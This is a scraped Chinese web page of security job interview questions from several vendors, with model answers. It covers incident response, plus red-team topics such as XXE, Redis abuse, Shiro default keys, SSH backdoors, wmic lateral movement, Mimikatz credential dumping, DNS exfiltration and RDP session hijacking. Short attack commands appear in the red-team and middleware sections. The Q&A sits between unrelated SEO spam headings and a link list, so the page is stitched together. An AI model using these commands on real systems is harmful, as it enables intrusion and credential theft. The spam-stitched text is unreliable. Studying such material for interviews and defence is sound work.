当前位置: 首页 > wzjs >正文

21dove谁做的的网站漯河seo公司

21dove谁做的的网站,漯河seo公司,网站站点层叠样式怎么做,二级网站收录网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 各厂商二面试题01 一、青藤(蓝队) 1. 自我介绍 2. 设备误报处理(日…

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 各厂商二面试题01

一、青藤(蓝队)

1. 自我介绍

2. 设备误报处理(日志)

3. 扫描流量与手动流量的区分

4. 被拿Shell的应急响应

5. 代理数据流分析

二、360(蓝队)

1. 溯源与态势感知

2. 基础漏洞原理

三、漏洞盒子

1. 印象最深的渗透经历

2. 漏洞平台提交与排名

3. 挖洞与渗透测试

四、未知厂商

1. 中间件漏洞

2. 权限维持手段

3. 隧道与代理

五、长亭-红队(红队)

1. 打点漏洞

2. Shiro漏洞检测

3. Shiro漏洞类型

4. 不出网场景利用

5. 横向渗透与密码抓取

6. 会话劫持


 各厂商二面试题01

一、青藤
蓝队1、自我介绍2、设备误报如何处理(日志)3、如何查看区分是扫描流量和手动流量(扫描数据量大,请求有规律,手动扫描间隔较少)4、被拿shell了如何处理(排查、清除、关站、看看可有即使修复的可能,没有可能就关站)5、如何分析被代理出来的数据流二、360
蓝队1、溯源  态势感知  安全设备2、基础的漏洞原理  ssrf xxe  Redis几种利用方式三、漏洞盒子
1、印象最深的渗透经历,技术关键点2、是否在漏洞平台有提交过漏洞,以及排名情况3、平时挖洞的情况,平台提交漏洞和渗透测试方面四、未知厂商
1、讲一下使过的中间件漏洞2、getshell后如何维持权限3、隧道、流量代理方面五、长亭-红队
红队(内容稍多)问:打点一般会用什么漏洞问:平常怎么去发现shiro漏洞的问:shiro有几种漏洞类型问:weblogic权限绕过有没有了解问:fastjson漏洞利用原理问:weblogic有几种漏洞问:IIOP听说过吗,和什么类似问:这几个漏洞不出网情况下怎么办问:拿到webshell不出网情况下怎么办问:dns出网协议怎么利用问:横向渗透命令执行手段问:psexec和wmic或者其他的区别问:Dcom怎么操作?问:抓取密码的话会怎么抓问:什么版本之后抓不到密码问:抓不到的话怎么办问:域内攻击方法有了解过吗问:桌面有管理员会话,想要做会话劫持怎么做

一、青藤(蓝队)

1. 自我介绍

需结合个人经验,突出以下要素:

  • 攻防演练经历(如护网行动中的角色、成果);
  • 安全设备运维经验(如EDR、WAF、蜜罐的部署与分析);
  • 威胁分析能力(如日志分析、流量溯源)。
2. 设备误报处理(日志)
  • 验证误报:对比原始日志与设备告警,检查请求参数、响应状态码是否合理;
  • 分类处理:通过白名单(如业务IP、合法扫描工具)或调整检测规则阈值;
  • 自动化优化:结合SIEM系统标记低风险事件,减少人工干预。
3. 扫描流量与手动流量的区分
  • 扫描流量特征
    • 高频请求(如每秒数十次同路径访问);
    • 固定User-Agent(如sqlmap、Nmap标识);
    • 覆盖全端口/IP段(如顺序扫描1-65535端口)。
  • 手动流量特征
    • 请求间隔随机(人工操作延迟);
    • 参数尝试性变化(如手工测试SQL注入的'1=1);
    • 关联登录态(如携带Cookie的敏感操作)。
4. 被拿Shell的应急响应
  • 隔离阶段
    • 立即断开服务器网络或关闭非核心服务;
    • 保留现场(内存转储、进程快照)。
  • 排查阶段
    • 查Web日志定位入侵路径(如上传漏洞、反序列化入口);
    • 检查计划任务、启动项、隐藏进程(如Linux cron、Windows注册表);
    • 比对Webshell哈希与正常文件。
  • 修复阶段
    • 修补漏洞(如框架升级、配置加固);
    • 部署HIDS监控异常行为(如命令执行、敏感目录访问)。
5. 代理数据流分析
  • 流量特征提取
    • 协议识别(如HTTP代理流量中的CONNECT方法);
    • 载荷分析(如Base64编码的隧道数据);
  • 行为关联
    • 追踪源IP与目标IP的会话持续性;
    • 检测异常DNS请求(如DNS隧道中的长域名查询)。

二、360(蓝队)

1. 溯源与态势感知
  • 溯源方法
    • 结合威胁情报(如IP信誉库、恶意域名库);
    • 关联多设备日志(如防火墙拦截记录 + EDR进程树分析)。
  • 态势感知设备联动
    • 通过NDR(网络检测与响应)实时分析流量;
    • 与SOAR平台集成自动化封禁恶意IP。
2. 基础漏洞原理
  • SSRF:利用服务端发起内部请求(如读取file:///etc/passwd或攻击Redis);
  • XXE:解析外部实体导致文件读取/SSRF(如<!ENTITY xxe SYSTEM "file:///etc/passwd">);
  • Redis利用
    • 未授权写SSH密钥(config set dir /root/.ssh);
    • 主从复制RCE(通过SLAVEOF加载恶意模块)。

三、漏洞盒子

1. 印象最深的渗透经历

案例:某金融系统通过链式漏洞突破边界:

  • 信息泄露:Git源码暴露数据库配置;
  • 垂直越权:修改Cookie中的userid参数访问管理员接口;
  • RCE:利用Fastjson反序列化注入内存马。
    技术关键点:绕过WAF规则(如分块传输编码、注释符混淆)。
2. 漏洞平台提交与排名
  • 示例回答:在EDUSRC/CNVD提交过20+漏洞,曾获某季度TOP 10;
  • 强调漏洞类型多样性(如逻辑漏洞占比40%,配置错误占比30%)。
3. 挖洞与渗透测试
  • 平台提交:侧重自动化工具+人工验证(如AWVS扫描后手工挖掘业务逻辑漏洞);
  • 渗透测试:红队协作模式(如内网横向渗透时结合BloodHound分析域环境)。

四、未知厂商

1. 中间件漏洞
  • Apache:解析漏洞(.php.xxx 被当作PHP执行);
  • Nginx:错误配置导致目录穿越(/files../);
  • Tomcat:CVE-2017-12615(PUT上传漏洞)。
2. 权限维持手段
  • 后门类型
    • Web层:隐藏Webshell(如.index.php.swp );
    • 系统层:SSH软链接后门(ln -sf /usr/sbin/sshd /tmp/su);
  • 计划任务:Linux cron或Windows任务计划程序加载恶意脚本。
3. 隧道与代理
  • 工具选择
    • HTTP隧道:reGeorg/proxychains;
    • ICMP/DNS隧道:icmpsh/dnscat2;
  • 隐蔽性优化:流量加密(如AES) + 模拟合法协议(如伪装成Cloudflare流量)。

五、长亭-红队(红队)

1. 打点漏洞
  • 高频漏洞
    • Web框架漏洞(如Shiro反序列化、Fastjson RCE);
    • 中间件漏洞(Weblogic T3协议反序列化);
    • 未授权访问(如Redis、Hadoop YARN)。
2. Shiro漏洞检测
  • 识别特征:Cookie中的rememberMe字段;
  • 利用方式
    • 密钥硬编码(如默认密钥kPH+bIxk5D2deZiIxcaaaA==);
    • 反序列化Gadget(如CommonsBeanutils链)。
3. Shiro漏洞类型
  • 反序列化漏洞(CVE-2016-4437);
  • 权限绕过(CVE-2020-1957);
  • 密钥硬编码(默认密钥未修改)。
4. 不出网场景利用
  • 协议复用
    • 利用SMB协议进行内网穿透(如Procmon监控445端口);
    • DNS Log外带数据(如通过dig xxx.ceye.io 回传结果)。
  • 工具适配
    • 不出网Webshell使用内存马(如Java Agent注入);
    • 通过ICMP隧道执行命令(如PingTunnel)。
5. 横向渗透与密码抓取
  • 横向命令执行
    • WMI执行远程命令(wmic /node:192.168.1.2 process call create "cmd.exe" );
    • DCOM通过MMC20.Application组件调用(GetObject("winmgmts:\\\\192.168.1.2\\..."))。
  • 密码抓取与绕过
    • 工具:Mimikatz(sekurlsa::logonpasswords);
    • Windows 2012后需绕过LSA保护(如加载驱动mimidrv.sys );
    • 无明文密码时使用PTH(Pass-the-Hash)或Kerberos票证攻击。
6. 会话劫持
  • 工具与方法
    • 使用Mimikatz的ts::sessions查看会话ID;
    • 通过RDP劫持(如Shadow Attack)接管已登录的会话;
    • 注入DLL到explorer.exe 进程获取用户令牌。
http://www.dtcms.com/wzjs/146285.html

相关文章:

  • 做网站用那个浏览器青岛seo软件
  • 网站建设总结产品经理培训哪个机构好
  • 网站建设成品潍坊seo培训
  • 泰安新闻网今日头条链接优化方法
  • 怎么注册个人的网站市场推广计划书
  • 武汉做网站及logo的公司如何模板建站
  • 河北省建设厅网站网上建设大厅第一营销网
  • 建网站用什么发票网站策划方案范文
  • wordpress首页非常慢湖南关键词优化首选
  • 网站备案号申请流程网站关键词排名
  • 建设小说网站的系统有哪些绍兴seo网站推广
  • 网站综合营销方案搜索引擎营销的典型案例
  • 无锡网站建设报价电商培训内容有哪些
  • 小卖部做网站百度下载官方下载安装
  • 太原网络营销网站百度游戏中心app
  • 成都b2b网站制作海外推广营销系统
  • 设计网站会员河北网络推广技术
  • 甲级建筑设计公司淘宝seo排名优化
  • b2b网站推广宁波网站建设制作报价
  • 开通网站必须做域名空间百度指数大数据分享平台
  • 做网站具体流程网络营销工作内容是什么
  • 旅游网站分析杭州百度快照推广
  • 网站meta网页描述seo推广软件下载
  • 如何自己做摄影网站一键制作免费网站的app
  • 抽纸网站建设摘要长沙网站设计拓谋网络
  • 温岭建设规划局网站找客户的软件有哪些
  • 网站建设怎么做分录营销型网站建设多少钱
  • 古装摄影网站建设方案短视频代运营合作方案
  • 网站页面不更新如何提高关键词搜索排名
  • 在线教育网站建设方案免费推广工具